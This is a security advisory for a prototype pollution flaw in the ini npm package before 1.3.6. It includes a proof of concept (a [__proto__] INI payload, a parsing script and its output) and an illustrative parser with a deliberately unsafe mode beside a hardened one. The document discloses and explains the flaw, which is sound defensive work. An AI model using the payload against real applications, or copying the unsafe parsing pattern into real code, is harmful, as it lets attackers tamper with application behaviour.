GHSA-qqgx-2p2h-9c37

Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/12/GHSA-qqgx-2p2h-9c37/GHSA-qqgx-2p2h-9c37.json
Aliases
Published
2020-12-10T16:53:45Z
Modified
2022-08-03T23:35:50Z
Details

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, the file's contents pollute Object.prototype in that application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini:

[__proto__]
polluted = "polluted"

poc.js:

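var fs = require('fs')
var ini = require('ini')

// Parse the attacker-supplied file; the [__proto__] section is written onto Object.prototype
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
// A fresh, unrelated object now inherits the injected property
console.log({}.__proto__)
// The global object inherits from Object.prototype too, so the bare identifier resolves
console.log(polluted)

> node poc.js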
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
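
The mechanism behind the reproduction above, as an added example (not code from the advisory or from the ini package): a simplified section parser, constructed here, whose unsafe mode follows a [__proto__] header into Object.prototype, and whose default mode uses prototype-less containers and skips reserved names. The names parseIni, BLOCKED, SAMPLE and demo are hypothetical, and the hardening shown is one possible approach, not a description of the 1.3.6 patch.

```javascript
// Simplified INI section parser, constructed for illustration (not the ini package's source).
// { safe: false } reproduces the vulnerable pattern; the default is the hardened form.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

function parseIni(text, opts = {}) {
  const safe = opts.safe !== false;
  // Hardened: containers have no prototype, so no key can reach Object.prototype.
  const make = () => (safe ? Object.create(null) : {});
  const out = make();
  let target = out;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith(';') || line.startsWith('#')) continue;
    const section = /^\[([^\]]*)\]$/.exec(line);
    if (section) {
      const name = section[1];
      if (safe && BLOCKED.has(name)) {
        target = make(); // throwaway sink: the section's keys go nowhere
        continue;
      }
      // Vulnerable when unsafe: out['__proto__'] resolves to Object.prototype,
      // which is truthy, so it becomes the write target for this section.
      target = out[name] = out[name] || make();
      continue;
    }
    const kv = /^([^=]+?)\s*=\s*(.*)$/.exec(line);
    if (!kv) continue;
    if (safe && BLOCKED.has(kv[1])) continue;
    target[kv[1]] = kv[2].replace(/^"(.*)"$/, '$1');
  }
  return out;
}

// Constructed sample input: the payload.ini shape from above plus a benign section.
const SAMPLE = '[__proto__]\npolluted = "polluted"\n[db]\nhost = localhost\n';

function demo() {
  parseIni(SAMPLE, { safe: false });
  const unsafePolluted = ({}).polluted; // read from an unrelated object
  delete Object.prototype.polluted; // undo the pollution before the hardened run
  const cfg = parseIni(SAMPLE);
  return { unsafePolluted, safePolluted: ({}).polluted, host: cfg.db.host };
}

console.log(demo());
```
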
References

Affected packages

npm / ini

ini

Affected ranges

Type
SEMVER
Events
Introduced
0
Fixed
1.3.6

Affected versions